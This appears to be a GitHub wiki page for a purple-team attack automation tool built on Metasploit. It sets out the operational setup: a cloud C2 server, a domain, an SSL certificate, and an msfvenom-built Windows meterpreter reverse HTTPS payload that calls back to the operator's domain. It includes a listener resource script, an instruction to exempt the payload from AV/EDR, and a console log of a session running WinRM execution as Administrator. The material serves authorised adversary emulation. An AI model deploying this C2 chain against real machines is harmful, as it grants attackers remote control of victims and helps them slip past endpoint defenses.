Skip to content

Operational Setup and Usage

dweezy-netsec edited this page Apr 17, 2019 · 3 revisions

Setup and Usage

C2 Server

Spin up a cloud virtual machine. Praetorian is a fan of GCP, but other providers also would suffice.

https://cloud.google.com/compute/docs/quickstart-linux#create_a_virtual_machine_instance

DNS

Pick a domain name and register it in DNS. CloudFlare is easy and has low prices for domain name registration.

https://www.cloudflare.com/dns/

SSL

We recommend utilizing a valid SSL certificate for operational testing. LetsEncrypt is free and fast.

export DNS_NAME="mytestdomain.com"
wget https://dl.eff.org/certbot-auto
chmod a+x ./certbot-auto
./certbot-auto -q
./certbot-auto certonly -d $DNS_NAME --standalone --register-unsafely-without-email -n --agree-tos

Installation

Follow the directions here

SSL Certificate

Assuming you cloned to your home directory (replace the domain with your domain name)

cd /etc/letsencrypt/live/mytestdomain.com
cat privkey.pem fullchain.pem > ~/purple-team-attack-automation/MSF.pem

Payload

cd ~
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
  chmod 755 msfinstall && \
  ./msfinstall
msfvenom -p windows/x64/meterpreter_reverse_https lhost=mytestdomain.com lport=443 -a x64 -f exe HandlerSSLCert=~/purple-team-attack-automation/MSF.pem StagerVerifySSLCert=true -o ~/attack-testing.exe

Transfer the payload to your test Windows box (make sure to add an exception for it in whatever AV/EDR you're using).

Listener

You can use the example resource script below to start your listener.

$ echo '<ruby>
print_status("Starting HTTPS listener for Windows x64 meterpreter on port 443.")
run_single("use exploit/multi/handler")
run_single("set payload windows/x64/meterpreter_reverse_https")
run_single("set lport 443")
run_single("set HandlerSSLCert MSF.pem")
run_single("set ExitOnSession false")
run_single("set StagerVerifySSLCert true")
run_single("exploit -j")
</ruby>' > ~/purple-team-attack-automation/scripts/resource/windows_listener.rc

After your listener is up and running, execute the payload as an administrator/root and you should receive a callback.

Using a Module

msf5 auxiliary(scanner/smb/impacket/secretsdump) > resource windows_listener.rc 
[*] Processing /usr/src/metasploit-framework/scripts/resource/windows_listener.rc for ERB directives.
[*] resource (/usr/src/metasploit-framework/scripts/resource/windows_listener.rc)> Ruby Code (270 bytes)
[*] Starting HTTPS listener for Windows x64 meterpreter on port 443.
payload => windows/x64/meterpreter_reverse_https
lport => 443
lhost => 0.0.0.0
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Redirecting stageless connection from /2F-7ig9OfztlUGRSOeTJogLC1HD_4Yf2RGj-ZlWaPE6oCIdO_nvk_GC913H-gXl7lhXUXYcn with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] https://0.0.0.0:443 handling request from 192.168.137.11; (UUID: czgdxj3z) Attaching orphaned/stageless session...
[*] Meterpreter session 1 opened (172.18.0.3:443 -> 192.168.137.11:52012) at 2019-04-15 16:10:27 +0000

msf5 post(windows/purple/t1005) > use post/windows/purple/t1028
msf5 post(windows/purple/t1028) > info

       Name: Windows Remote Management (T1028) Windows - Purple Team
     Module: post/windows/purple/t1028
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Praetorian

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting                                                       Required  Description
  ----     ---------------                                                       --------  -----------
  CLEANUP  true                                                                  yes       Close any instances of calc
  CMD      winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}  yes       Command to execute
  SESSION  1                                                                     yes       The session to run this module on.

Description:
  Execution, Lateral Movement: Windows Remote Management (WinRM) is 
  the name of both a Windows service and a protocol that allows a user 
  to interact with a remote system (e.g., run an executable, modify 
  the Registry, modify services). It may be called with the winrm 
  command or by any number of programs such as PowerShell.

References:
  CVE: Not available
  https://attack.mitre.org/wiki/Technique/T1028

msf5 post(windows/purple/t1028) > exploit

[+] Found an instance of Calculator running. Killing it.
[*] Executing 'cmd /c winrm qc -q & winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}' on #<Session:meterpreter 192.168.137.11:52012 (10.0.2.15) "PURPLEDEV\Administrator @ DESKTOP-1">
[!] WinRM service is already running on this machine.
WSManFault
    Message
        ProviderFault
            WSManFault
                Message = WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again. 

Error number:  -2144108183 0x80338169
WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again. 
create_OUTPUT
    ProcessId = 5456
    ReturnValue = 0

[+] Module T1028W execution successful.
[+] Found an instance of Calculator running. Killing it.
[+] Found an instance of Calculator running. Killing it.
[*] Post module execution completed
msf5 post(windows/purple/t1028) > 
You can’t perform that action at this time.